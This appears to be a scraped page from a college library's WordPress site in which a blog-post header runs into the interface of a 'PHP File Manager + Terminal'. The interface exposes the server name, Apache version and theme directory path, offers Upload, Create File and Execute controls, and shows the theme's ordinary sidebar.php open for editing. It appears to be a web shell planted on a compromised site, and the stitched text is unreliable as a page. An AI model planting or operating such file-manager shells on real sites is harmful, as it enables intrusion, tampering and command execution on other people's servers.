Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/library/wp-content/themes/understrap Upload Create File Create Folder Execute Editing: /var/www/html/library/wp-content/themes/understrap/sidebar.php<?php /** * The sidebar containing the main widget area * * @package Understrap */ // Exit if accessed directly. defined( 'ABSPATH' ) || exit; if ( ! is_active_sidebar( 'sidebar-1' ) ) { return; } ?> <div class="col-md-4 widget-area" id="secondary"> <?php dynamic_sidebar( 'sidebar-1' ); ?> </div><!-- #secondary --> Save